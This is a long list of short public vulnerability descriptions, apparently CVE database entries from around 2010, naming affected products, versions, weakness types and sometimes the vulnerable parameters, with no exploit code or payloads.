Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP ProLiant G6 Lights-Out 100 Remote Management card with firmware before 4.06 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in RealNetworks RealPlayer 11.0 through 11.1 allows attackers to bypass intended access restrictions on files via unknown vectors.
Unspecified vulnerability in an ActiveX control in the Internet Explorer (IE) plugin in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows has unknown impact and attack vectors related to "multiple browser windows."
Stack-based buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.14 and 1.2.0 through 1.2.9 has unknown impact and remote attack vectors.  NOTE: this issue exists because of a CVE-2010-2284 regression.
The IPMI dissector in Wireshark 1.2.0 through 1.2.9 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
packet-gsm_a_rr.c in the GSM A RR dissector in Wireshark 1.2.2 through 1.2.9 allows remote attackers to cause a denial of service (crash) via unknown vectors that trigger a NULL pointer dereference.
bgpd in Quagga before 0.99.17 does not properly parse AS paths, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unknown AS type in an AS path attribute in a BGP UPDATE message.
Multiple unspecified vulnerabilities in ZNC 0.092 allow remote attackers to cause a denial of service (exception and daemon crash) via unknown vectors related to "unsafe substr() calls."
The SVG implementation in Google Chrome before 5.0.375.125 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
The rendering implementation in Google Chrome before 5.0.375.125 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in the layout implementation in Google Chrome before 5.0.375.125 allows remote attackers to obtain sensitive information from process memory via unknown vectors.
Google Chrome before 5.0.375.125 does not properly mitigate an unspecified flaw in the GNU C Library, which has unknown impact and attack vectors.
Google Chrome before 5.0.375.125 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in an ActiveX control in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Windows allow attackers to execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in Adobe Reader and Acrobat 9.x before 9.4 on Linux allow attackers to gain privileges via unknown vectors.
Unspecified vulnerability in Adobe Shockwave Player before 11.5.8.612 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption.  NOTE: due to conflicting information and use of the same CVE identifier by the vendor, ZDI, and TippingPoint, it is not clear whether this issue is related to use of an uninitialized pointer, an incorrect pointer offset calculation, or both.
Unspecified vulnerability in Adobe Shockwave Player before 11.5.8.612 allows attackers to cause a denial of service via unknown vectors.
Multiple SQL injection vulnerabilities in modfile.php in Event Horizon (EVH) 1.1.10, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) YourEmail and (2) VerificationNumber parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
BarnOwl before 1.6.2 does not check the return code of calls to the (1) ZPending and (2) ZReceiveNotice functions in libzephyr, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in LISTSERV 15 and 16 allows remote attackers to inject arbitrary web script or HTML via the T parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in index.php in RightInPoint Lyrics Script 3.0 allows remote attackers to inject arbitrary web script or HTML via the artist_id parameter, which is not properly handled in a forced SQL error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Software Distributor (sd) in HP HP-UX B.11.11, B.11.23, and B.11.31 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in the HP MagCloud app before 1.0.5 for the iPad allows remote attackers to read and modify MagCloud application data via unknown vectors.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability on the HP ProCurve 2610 switch before R.11.22, when DHCP is enabled, allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP ProCurve 2626 and 2650 switches before H.10.80 allows remote attackers to obtain sensitive information, modify data, and cause a denial of service via unknown vectors.
Unspecified vulnerability in the In-band Agent on the HP ProCurve 2610 switch before R.11.30 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability on the HP ProCurve 1800-24G switch with software PB.03.02 and earlier, and the ProCurve 1800-8G switch with software PA.03.02 and earlier, when SNMP is enabled, allows remote attackers to obtain sensitive information via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Sijio Community Software allow remote authenticated users to inject arbitrary web script or HTML via the title parameter when (1) editing a new blog, (2) adding an album, or (3) editing an album.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Adaptive Micro Systems ALPHA Ethernet Adapter II Web-Manager 3.40.2 allows remote attackers to bypass authentication and read or write configuration files via unknown vectors.
The Cascading Style Sheets (CSS) implementation in Google Chrome before 5.0.375.99 does not properly perform style rendering, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in Google Chrome before 5.0.375.99 has unknown impact and attack vectors, related to an "annoyance with print dialogs."
The implementation of the Unicode Bidirectional Algorithm (aka Bidi algorithm or UBA) in Google Chrome before 5.0.375.99 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in Google Chrome before 5.0.375.99, when WebGL is used, allows remote attackers to cause a denial of service (out-of-bounds read) via unknown vectors.
Unspecified vulnerability in the Client Service for DPM in Hitachi ServerConductor / Deployment Manager 01-00, 01-01, and 06-00 through 06-00-/A; ServerConductor / Deployment Manager Standard Edition and Enterprise Edition 07-50 through 07-55, and 07-57 through 07-59; and JP1/ServerConductor/Deployment Manager Standard and Enterprise Edition 07-50 through 07-56-/F, 08-00 through 08-09-/E, 08-50 through 08-80-/A, 08-06 through 08-07, and 08-51 through 08-70; allows attackers to cause a denial of service (shutdown and reboot) via unknown vectors.
Unspecified vulnerability in the HP OpenVMS Auditing feature in OpenVMS ALPHA 7.3-2, 8.2, and 8.3; and OpenVMS for Integrity Servers 8.3 AND 8.3-1H1; allows local users to obtain sensitive information via unknown vectors.
The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 does not properly initialize the number of channels, which allows attackers to obtain unspecified "memory access" via unknown vectors.
Unspecified vulnerability in the P8 Content Engine (P8CE) 4.5.1 before FP3 and the P8 Content Search Engine (P8CSE) before 4.5.0 FP3 and 4.5.1 before FP1, as used in IBM FileNet P8 Content Manager (CM) and FileNet P8 Business Process Manager (BPM), allows remote attackers to gain privileges via unknown vectors.  NOTE: some of these details are obtained from third party information.
Multiple unspecified vulnerabilities in IBM Rational ClearQuest before 7.1.1.02 have unknown impact and attack vectors, as demonstrated by an AppScan report.
Multiple SQL injection vulnerabilities in 2daybiz Multi Level Marketing (MLM) Software allow remote attackers to execute arbitrary SQL commands via the username parameter to (1) index.php and (2) admin/index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Splunk 4.0 through 4.0.10 and 4.1 through 4.1.1 allow (1) remote attackers to read arbitrary files, aka SPL-31194; (2) remote authenticated users to modify arbitrary files, aka SPL-31063; or (3) have an unknown impact via redirects, aka SPL-31067.
The TIFFExtractData macro in LibTIFF before 3.9.4 does not properly handle unknown tag types in TIFF directory entries, which allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted TIFF file.
Directory traversal vulnerability in the DCC functionality in KVIrc 3.4 and 4.0 allows remote attackers to overwrite arbitrary files via unknown vectors.
Multiple unspecified vulnerabilities in Opera before 10.54 have unknown impact and attack vectors related to (1) "extremely severe," (2) "highly severe," (3) "moderately severe," and (4) "less severe" issues.
Multiple unspecified vulnerabilities in Fenrir Inc. ActiveGeckoBrowser 1.0.0 and 1.0.5 alpha, a module for the Sleipnir web browser, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors related to the Gecko engine.
Unspecified vulnerability in the Java Virtual Machine component in Oracle Database Server 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Territory Management component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Agile PLM component in Oracle Supply Chain Products Suite 9.3.0.0 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the (1) Sun Convergence 1 and (2) Sun Java Communications Suite 7 components in Oracle Sun Products Suite 1.0 and 7.0 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the BI Publisher component in Oracle Fusion Middleware 10.1.3.3.2 and 10.1.3.4.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the OLAP component in Oracle Database Server 11.1.0.7 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Cabo/UIX component in Oracle Fusion Middleware 10.1.2.3 and 10.1.3.5 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2395 and CVE-2010-2409.
Unspecified vulnerability in the Cabo/UIX component in Oracle Fusion Middleware 10.1.2.3 and 10.1.3.5 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2395 and CVE-2010-2410.
Unspecified vulnerability in the Oracle iRecruitment component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the XDK component in Oracle Database Server 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Siebel Core - Highly Interactive Client component in Oracle Siebel Suite 7.7.2.12, 7.8.2.14, 8.0.0.10, and 8.1.1.3 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Siebel Core - Highly Interactive Client component in Oracle Siebel Suite 7.7.2.12, 7.8.2.14, 8.0.0.10, and 8.1.1.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2010-3500.
Unspecified vulnerability in the Oracle iRecruitment component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.2 allows remote authenticated users to affect integrity via unknown vectors related to Account.
Unspecified vulnerability in the PeopleSoft Enterprise Campus Solutions component in Oracle PeopleSoft and JDEdwards Suite Campus Solutions 9.0 Bundle #17 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.27 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM - eProfile Mgr component in Oracle PeopleSoft and JDEdwards Suite HCM 9.0 Bundle #9 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Solaris 9 and 10, and OpenSolaris, allows local users to affect availability via unknown vectors related to Kernel/Filesystem.
Unspecified vulnerability in Oracle Solaris 10 and OpenSolaris allows local users to affect availability via unknown vectors related to Kernel/VM.
Unspecified vulnerability in the PeopleSoft Enterprise HCM component in Oracle PeopleSoft and JDEdwards Suite HCM 9.0 Bundle #12 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Forms component in Oracle Fusion Middleware 10.1.2.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Cabo/UIX component in Oracle Fusion Middleware 10.1.2.3 and 10.1.3.5 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2409 and CVE-2010-2410.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.1.0.5 and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Database Control component in EM Console in Oracle Database Server 10.1.0.5 and 10.2.0.3, Oracle Fusion Middleware 10.1.2.3 and 10.1.4.3, and Enterprise Manager Grid Control allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Perl component in Oracle Database Server 11.2.0.1, 11.1.0.7, 10.2.0.3, 10.2.0.4, and 10.1.0.5; and Fusion Middleware 11.1.1.1.0 and 11.1.1.2.0; allows local users to affect integrity via unknown vectors related to Local Logon.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10, and OpenSolaris, allows local users to affect availability via unknown vectors related to GigaSwift Ethernet Driver.
Unspecified vulnerability in Oracle Sun Java System Web Proxy Server 4.0.13 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration Server.
Unspecified vulnerability in Oracle Solaris 9 and 10 allows local users to affect confidentiality and integrity via unknown vectors related to Solaris Management Console.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Application Server Control component in Oracle Fusion Middleware 10.1.2.3 and 10.1.4.0.1 allows remote authenticated users to affect integrity via unknown vectors, a different vulnerability than CVE-2010-0081.
Unspecified vulnerability in the PeopleSoft Enterprise FSCM component in Oracle PeopleSoft and JDEdwards Suite SCM 8.9 Bundle #37, SCM 9.0 Bundle #30, and SCM 9.1 Bundle #4 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM - Time &amp; Labor component in Oracle PeopleSoft and JDEdwards Suite HCM 9.0 Bundle #13 and HCM 9.1 Bundle #2 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise CRM component in Oracle PeopleSoft and JDEdwards Suite CRM 9.0 Bundle #28 and CRM 9.1 Bundle #4 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft and JDEdwards Suite 8.49.27 and 8.50.10 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle Solaris 8, 9, and 10 allows local users to affect confidentiality and integrity via unknown vectors related to Solaris Management Console.
Unspecified vulnerability in Solaris Studio 12 update 1 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Console component in Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1.1 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2010-2371.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1.1 allows local users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2010-2372.
Cross-site scripting (XSS) vulnerability in error.php in Pilot Group (PG) eLMS Pro allows remote attackers to inject arbitrary web script or HTML via the message parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Open redirect vulnerability in RSA Federated Identity Manager 4.0 before 4.0.25 and 4.1 before 4.1.26 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unknown vectors.
IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.11 on z/OS allows attackers to perform unspecified "link injection" actions via unknown vectors.
The implementation of unspecified DOM methods in Google Chrome before 5.0.375.70 allows remote attackers to bypass the Same Origin Policy via unknown vectors.
Unspecified vulnerability in the web interface in snom VoIP Phone firmware 8 before 8.2.35 allows remote attackers to bypass intended restrictions and modify user credentials via unknown vectors.  NOTE: some of these details are obtained from third party information.
Buffer overflow in the SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.
The SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors.
The SMB PIPE dissector in Wireshark 0.8.20 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors.
Buffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors.
The SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors.
Unspecified vulnerability in iframe_history.html in Dojo 0.4.x before 0.4.4 has unknown impact and remote attack vectors.
Red Hat libvirt, possibly 0.7.2 through 0.8.2, recurses into disk-image backing stores without extracting the defined disk backing-store format, which might allow guest OS users to read arbitrary files on the host OS, and possibly have unspecified other impact, via unknown vectors.
Red Hat libvirt, possibly 0.6.1 through 0.8.2, looks up disk backing stores without referring to the user-defined main disk format, which might allow guest OS users to read arbitrary files on the host OS, and possibly have unspecified other impact, via unknown vectors.
Unspecified vulnerability in Adobe Flash Media Server (FMS) before 3.0.6, and 3.5.x before 3.5.4, allows attackers to cause a denial of service (memory consumption) via unknown vectors.
Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the CA (1) PSFormX and (2) WebScan ActiveX controls, as distributed on the CA Global Advisor web site until May 2009, allow remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.
Adobe Flash Player 9 before 9.0.277.0 on unspecified UNIX platforms allows attackers to cause a denial of service via unknown vectors.
Multiple unspecified vulnerabilities in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in the Storm module 5.x and 6.x before 6.x-1.33 for Drupal allow remote authenticated users, with certain module privileges, to inject arbitrary web script or HTML via the (1) fullname, (2) phone, or (3) im parameter in a stormperson action to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in CA ARCserve Backup r11.5 SP4, r12.0 SP2, and r12.5 SP1 on Windows allows local users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in JustSystems Ichitaro 2004 through 2009, Ichitaro Government 2006 through 2009, and Just School 2008 and 2009 allows remote attackers to execute arbitrary code via unknown vectors related to "product character attribute processing" for a document.
Cross-site request forgery (CSRF) vulnerability in Fujitsu e-Pares V01 L01 V01 L01, L03, L10, L20, L30, and L40 allows remote attackers to hijack the authentication of users for requests that modify "facility reservation data" via unknown vectors.
SQL injection vulnerability in itemdetail.php in Multishop CMS allows remote attackers to execute arbitrary SQL commands via the itemid parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in pages.php in Multishop CMS allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in the FTP service in FileCOPA before 5.03 allows remote attackers to read or overwrite arbitrary files via unknown vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Google Chrome before 5.0.375.55 allows remote attackers to bypass the whitelist-mode plugin blocker via unknown vectors.
Cross-site scripting (XSS) vulnerability in jsp/audit/reports/ExportReport.jsp in ManageEngine ADAudit Plus 4.0.0 build 4043 allows remote attackers to inject arbitrary web script or HTML via the reportList parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in downlot.php in Lokomedia CMS 1.4.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the file parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in Six Apart Movable Type 5.0 and 5.01 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in the Auditing subsystem in HP OpenVMS 8.3, 8.2, 7.3-2, and earlier on the ALPHA platform, and 8.3-1H1, 8.3, 8.2-1, and earlier on the Itanium platform, allows local users to gain privileges or obtain sensitive information via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1968.
Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data, and consequently gain privileges, via unknown vectors.
Cross-site scripting (XSS) vulnerability in HP Virtual Connect Enterprise Manager for Windows before 6.1 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Insight Software Installer for Windows before 6.1 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, a different vulnerability than CVE-2010-1971.
Unspecified vulnerability in HP Insight Software Installer for Windows before 6.1 allows local users to read or modify data via unknown vectors.
Unspecified vulnerability in HP Insight Control power management for Windows before 6.1 allows local users to read or modify data, or cause a denial of service, via unknown vectors.
Unspecified vulnerability in HP Insight Orchestration for Windows before 6.1 allows remote attackers to read or modify data via unknown vectors.
Unspecified vulnerability in HP StorageWorks Storage Mirroring 5 before 5.2.1.870.0 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP TestDirector for Quality Center 9.2 before Patch8 allows remote attackers to modify data via unknown vectors.
SQL injection vulnerability in the Online News Paper Manager (com_jnewspaper) component 1.0 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the date_info parameter to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Servlet service in Fujitsu Limited Interstage Application Server 3.0 through 7.0, as used in Interstage Application Framework Suite, Interstage Business Application Server, and Interstage List Manager, allows attackers to obtain sensitive information or force invalid requests to be processed via unknown vectors related to unspecified invalid requests and settings on the load balancing device.
Unspecified vulnerability in NEC WebSAM DeploymentManager 5.13 and earlier, as used in SigmaSystemCenter 2.1 Update2 and earlier, BladeSystemCenter, ExpressSystemCenter, and VirtualPCCenter 2.2 and earlier, allows remote attackers to cause a denial of service (OS shutdown or restart) via unknown vectors related to Client Service for DPM and crafted packets to port 56010.
Apple Safari 4.0.5 on Windows sends the "Authorization: Basic" header appropriate for one web site to a different web site named in a Location header received from the first site, which allows remote web servers to obtain sensitive information by logging HTTP requests. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in RepairShop2 1.9.023 Trial, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the prod parameter in a products.details action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in auktion.php in Pay Per Watch &amp; Bid Auktions System allows remote attackers to inject arbitrary web script or HTML via the id_auk parameter, which is not properly handled in a forced SQL error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: this might be resultant from CVE-2010-1855.
Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769.
Multiple SQL injection vulnerabilities in OCS Inventory NG before 1.02.3 allow remote attackers to execute arbitrary SQL commands via (1) multiple inventory fields to the search form, reachable through index.php; or (2) the "Software name" field to the "All softwares" search form, reachable through index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in Mahara before 1.0.15, 1.1.x before 1.1.9, and 1.2.x before 1.2.5 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Google Chrome before 4.1.249.1064 does not properly handle fonts, which allows remote attackers to cause a denial of service (memory corruption) and possibly have unspecified other impact via unknown vectors.
Google Chrome before 4.1.249.1064 does not properly handle HTML5 media, which allows remote attackers to cause a denial of service (memory corruption) and possibly have unspecified other impact via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in the back end in Joomla! 1.5 through 1.5.17 allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "various administrator screens," possibly the search parameter in administrator/index.php.
mm/shmem.c in the Linux kernel before 2.6.28-rc3, when strict overcommit is enabled, does not properly handle the export of shmemfs objects by knfsd, which allows attackers to cause a denial of service (NULL pointer dereference and knfsd crash) or possibly have unspecified other impact via unknown vectors.
Unspecified vulnerability in posting.php in phpBB before 3.0.5 has unknown impact and attack vectors related to the use of a "forum id" in circumstances related to a "global announcement."
Stack-based buffer overflow in IBM Lotus Notes 8.5 and 8.5fp1, and possibly other versions, allows remote attackers to execute arbitrary code via unknown attack vectors, as demonstrated by the vd_ln module in VulnDisco 9.0.  NOTE: as of 20100222, this disclosure has no actionable information. However, because the VulnDisco author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Multiple SQL injection vulnerabilities in isearch.php in NCT Jobs Portal Script allow remote attackers to execute arbitrary SQL commands via the (1) anyword and (2) cityname parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
phpThumb.php in phpThumb() 1.7.9 and possibly other versions, when ImageMagick is installed, allows remote attackers to execute arbitrary commands via the fltr[] parameter, as discovered in the wild in April 2010.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the SIP implementation on the Cisco PGW 2200 Softswitch with software 9.7(3)S before 9.7(3)S9 and 9.7(3)P before 9.7(3)P9 allows remote attackers to cause a denial of service (TCP socket exhaustion) via unknown vectors, aka Bug ID CSCsk13561.
Unspecified vulnerability in HP Multifunction Peripheral (MFP) Digital Sending Software before 4.18.3 allows local users to bypass intended restrictions on the MFP "Send to e-mail" feature, and obtain sensitive information, via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) 5.3, 5.3 Update 1, and 6.0 allows remote attackers to obtain sensitive information and modify data via unknown vectors.
Unspecified vulnerability in the Agent in HP LoadRunner before 9.50 and HP Performance Center before 9.50 allows remote attackers to execute arbitrary code via unknown vectors.
The Google V8 bindings in Google Chrome before 4.1.249.1059 allow attackers to cause a denial of service (memory corruption) via unknown vectors.
Google Chrome before 4.1.249.1059 does not prevent pages from loading with the New Tab page's privileges, which has unknown impact and attack vectors.
Google Chrome before 4.1.249.1059 does not properly support forms, which has unknown impact and attack vectors, related to a "type confusion error."
Directory traversal vulnerability in help/frameRight.php in Elastix 1.6.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the id_nodo parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM Cognos 8 Business Intelligence before 8.4.1 FP1 has unknown impact and attack vectors.
Directory traversal vulnerability in WebAsyst Shop-Script FREE has unknown impact and attack vectors via the sub parameter.
Cross-site scripting (XSS) vulnerability in the SearchHighlight plugin in MODx Evolution before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to AjaxSearch.
SQL injection vulnerability in MODx Evolution before 1.0.3 allows remote attackers to execute arbitrary SQL commands via unknown vectors related to WebLogin.
Multiple cross-site scripting (XSS) vulnerabilities in admin/admin_login.php in Uiga Fan Club, as downloaded on 20100310, allow remote attackers to inject arbitrary web script or HTML via the (1) admin_name and (2) admin_password parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in bluegate_seo.inc.php in the Direct URL module for xt:Commerce, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the coID parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability on the TANDBERG Video Communication Server (VCS) before X5.0 allows remote attackers to execute arbitrary code via unknown vectors, aka Reference ID 69773.
Unspecified vulnerability in the login process in IBM WebSphere Portal 6.0.1.1, and 6.1.0.x before 6.1.0.3 Cumulative Fix 03, has unknown impact and remote attack vectors.
Cross-site scripting (XSS) vulnerability in ts_other.php in the Teamsite Hack plugin 3.0 and earlier for WoltLab Burning Board allows remote attackers to inject arbitrary web script or HTML via the userid parameter in a modboard action, which is not properly handled in a forced SQL error message.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Heartlogic HL-SiteManager allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Directory traversal vulnerability in view.php in Pulse CMS 1.2.2 allows remote attackers to read arbitrary files via directory traversal sequences in the f parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows local users to obtain sensitive information via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in BBSXP 2008 SP2 allow remote attackers to inject arbitrary web script or HTML via the URI in a request to (1) AddPost.asp, (2) AddTopic.asp, (3) Admin_Default.asp, (4) Bank.asp, (5) Manage.asp, and (6) ShowPost.asp. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
